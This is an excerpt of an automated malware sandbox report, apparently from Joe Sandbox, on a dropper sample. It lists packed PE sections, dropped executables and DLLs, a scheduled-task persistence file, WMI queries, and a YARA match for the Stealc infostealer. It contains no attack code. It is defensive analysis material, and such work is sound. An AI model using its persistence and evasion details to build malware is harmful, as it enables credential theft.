                                    Source: EdYEXasNiR.exe Static PE information: section name:
                                    Source: EdYEXasNiR.exe Static PE information: section name: .idata
                                    Source: EdYEXasNiR.exe Static PE information: section name:
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.dr Static PE information: section name:
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.dr Static PE information: section name: .idata
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.dr Static PE information: section name:
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.dr Static PE information: section name: .idata
                                    Source: random[1].exe.3.dr Static PE information: section name:
                                    Source: random[1].exe.3.dr Static PE information: section name: .idata
                                    Source: HJEHIJEBKE.exe.3.dr Static PE information: section name:
                                    Source: HJEHIJEBKE.exe.3.dr Static PE information: section name: .idata
                                    Source: skotes.exe.5.dr Static PE information: section name:
                                    Source: skotes.exe.5.dr Static PE information: section name: .idata
                                    Source: random[3].exe.18.dr Static PE information: section name:
                                    Source: random[3].exe.18.dr Static PE information: section name: .idata
                                    Source: random[3].exe.18.dr Static PE information: section name:
                                    Source: 95ba65f98f.exe.18.dr Static PE information: section name:
                                    Source: 95ba65f98f.exe.18.dr Static PE information: section name: .idata
                                    Source: 95ba65f98f.exe.18.dr Static PE information: section name:
                                    Source: f2a96255ac.exe.18.dr Static PE information: section name:
                                    Source: f2a96255ac.exe.18.dr Static PE information: section name: .idata
                                    Source: random[3].exe0.18.dr Static PE information: section name:
                                    Source: random[3].exe0.18.dr Static PE information: section name: .idata
                                    Source: random[4].exe.18.dr Static PE information: section name:
                                    Source: random[4].exe.18.dr Static PE information: section name: .idata
                                    Source: random[4].exe.18.dr Static PE information: section name:
                                    Source: ccb71f0bac.exe.18.dr Static PE information: section name:
                                    Source: ccb71f0bac.exe.18.dr Static PE information: section name: .idata
                                    Source: random[4].exe0.18.dr Static PE information: section name:
                                    Source: random[4].exe0.18.dr Static PE information: section name: .idata
                                    Source: 0bf9323d7e.exe.18.dr Static PE information: section name:
                                    Source: 0bf9323d7e.exe.18.dr Static PE information: section name: .idata
                                    Source: 0bf9323d7e.exe.18.dr Static PE information: section name:
                                    Source: random[4].exe1.18.dr Static PE information: section name:
                                    Source: random[4].exe1.18.dr Static PE information: section name: .idata
                                    Source: random[4].exe1.18.dr Static PE information: section name:
                                    Source: e18644e148.exe.18.dr Static PE information: section name:
                                    Source: e18644e148.exe.18.dr Static PE information: section name: .idata
                                    Source: e18644e148.exe.18.dr Static PE information: section name:
                                    Source: random[3].exe2.18.dr Static PE information: section name:
                                    Source: random[3].exe2.18.dr Static PE information: section name: .idata
                                    Source: random[3].exe2.18.dr Static PE information: section name:
                                    Source: 8663788bd2.exe.18.dr Static PE information: section name:
                                    Source: 8663788bd2.exe.18.dr Static PE information: section name: .idata
                                    Source: 8663788bd2.exe.18.dr Static PE information: section name:
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.dr Static PE information: section name:
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.dr Static PE information: section name: .idata
                                    Source: jyidkjkfhjawd.exe.29.dr Static PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.dr Static PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.dr Static PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.dr Static PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.dr Static PE information: section name:
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe Process Stats: CPU usage > 49%
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe File created: C:\Windows\Tasks\skotes.job
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C435F203_2_6C435F20
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C557F203_2_6C557F20
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C51DFC03_2_6C51DFC0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C583FC03_2_6C583FC0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4ABFF03_2_6C4ABFF0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C421F903_2_6C421F90
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C45D8103_2_6C45D810
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C40D8E03_2_6C40D8E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4338E03_2_6C4338E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C55B8F03_2_6C55B8F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DF8F03_2_6C4DF8F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C47F9603_2_6C47F960
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4BD9603_2_6C4BD960
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C54F9003_2_6C54F900
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B59203_2_6C4B5920
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4999C03_2_6C4999C0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4399D03_2_6C4399D0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4659F03_2_6C4659F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4979F03_2_6C4979F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4119803_2_6C411980
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4D19903_2_6C4D1990
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C589A503_2_6C589A50
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C43FA103_2_6C43FA10
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4FDA303_2_6C4FDA30
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C401AE03_2_6C401AE0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DDAB03_2_6C4DDAB0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DFB603_2_6C4DFB60
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C44BB203_2_6C44BB20
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C447BF03_2_6C447BF0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C3F1B803_2_6C3F1B80
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4E5B903_2_6C4E5B90
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C459BA03_2_6C459BA0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4C9BB03_2_6C4C9BB0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C48D4103_2_6C48D410
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4E94303_2_6C4E9430
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4014E03_2_6C4014E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C5814A03_2_6C5814A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C54F5103_2_6C54F510
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4675003_2_6C467500
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4155103_2_6C415510
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4855F03_2_6C4855F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4395903_2_6C439590
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4556403_2_6C455640
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4196503_2_6C419650
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4296003_2_6C429600
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4776103_2_6C477610
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4316A03_2_6C4316A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4696A03_2_6C4696A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C46D7103_2_6C46D710
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4237203_2_6C423720
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4D97203_2_6C4D9720
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C5437C03_2_6C5437C0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C48B7A03_2_6C48B7A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4090503_2_6C409050
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4AF0503_2_6C4AF050
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C44B0203_2_6C44B020
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C3FD0503_2_6C3FD050
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B70903_2_6C4B7090
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C44F1503_2_6C44F150
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4C31203_2_6C4C3120
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4631C03_2_6C4631C0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4131E03_2_6C4131E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C5352703_2_6C535270
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4C72603_2_6C4C7260
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4C52203_2_6C4C5220
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4052F03_2_6C4052F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4CF2F03_2_6C4CF2F0
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00E75C835_2_00E75C83
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00E7735A5_2_00E7735A
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00EB88605_2_00EB8860
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00E74DE05_2_00E74DE0
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00E74B305_2_00E74B30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F978BB6_2_00F978BB
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F988606_2_00F98860
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F970496_2_00F97049
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F931A86_2_00F931A8
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F54B306_2_00F54B30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F54DE06_2_00F54DE0
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F92D106_2_00F92D10
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F9779B6_2_00F9779B
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F87F366_2_00F87F36
                                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: String function: 00E880C0 appears 130 times
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00F680C0 appears 130 times
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: String function: 6C423620 appears 120 times
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: String function: 6C429B10 appears 118 times
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: String function: 6C45C5E0 appears 35 times
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: String function: 6C539F30 appears 54 times
                                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                    Source: EdYEXasNiR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
                                    Source: EdYEXasNiR.exeStatic PE information: Section: ZLIB complexity 0.9999421772203947
                                    Source: EdYEXasNiR.exeStatic PE information: Section: ulqubmxb ZLIB complexity 0.9950317531136087
                                    Source: random[3].exe.18.drStatic PE information: Section: ZLIB complexity 0.9997622841282895
                                    Source: random[3].exe.18.drStatic PE information: Section: sxcdrnzu ZLIB complexity 0.994340416603802
                                    Source: 95ba65f98f.exe.18.drStatic PE information: Section: ZLIB complexity 0.9997622841282895
                                    Source: 95ba65f98f.exe.18.drStatic PE information: Section: sxcdrnzu ZLIB complexity 0.994340416603802
                                    Source: random[4].exe.18.drStatic PE information: Section: rpnbigxq ZLIB complexity 0.9902602964512406
                                    Source: ad25d67005.exe.18.drStatic PE information: Section: .bss ZLIB complexity 1.0003249845551894
                                    Source: random[5].exe.18.drStatic PE information: Section: .bss ZLIB complexity 1.0003249845551894
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: Section: habslsfa ZLIB complexity 0.9942491947741748
                                    Source: random[4].exe1.18.drStatic PE information: Section: habslsfa ZLIB complexity 0.9942491947741748
                                    Source: e18644e148.exe.18.drStatic PE information: Section: rpnbigxq ZLIB complexity 0.9902602964512406
                                    Source: random[3].exe2.18.drStatic PE information: Section: ZLIB complexity 0.9999614514802632
                                    Source: random[3].exe2.18.drStatic PE information: Section: yxdjfvbh ZLIB complexity 0.9946813540090772
                                    Source: 8663788bd2.exe.18.drStatic PE information: Section: ZLIB complexity 0.9999614514802632
                                    Source: 8663788bd2.exe.18.drStatic PE information: Section: yxdjfvbh ZLIB complexity 0.9946813540090772
                                    Source: random[1].exe0.18.drStatic PE information: Section: .bss ZLIB complexity 1.0003244500411184
                                    Source: 64252d274d.exe.18.drStatic PE information: Section: .bss ZLIB complexity 1.0003244500411184
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: Section: ZLIB complexity 0.9981477744464945
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: Section: ZLIB complexity 0.99796875
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: Section: .data ZLIB complexity 0.9965319237854804
                                    Source: random[1].exe.18.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: random[1].exe.18.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: 18.3.skotes.exe.140fb98.1.raw.unpack, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: 18.3.skotes.exe.140fb98.1.raw.unpack, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: 18.3.skotes.exe.149e220.0.raw.unpack, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: 18.3.skotes.exe.149e220.0.raw.unpack, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: cbfb8a9c89.exe.18.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: cbfb8a9c89.exe.18.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@154/1065@0/23
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C460300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,3_2_6C460300
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\V0YXXVJL.htmJump to behavior
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_03
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5584:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2372:120:WilError_03
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile created: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C0C9.tmp\C0CA.tmp\C0CB.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "mnn.exe")
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                    Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "nnu.exe")
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                    Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "svdhost.exe")
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
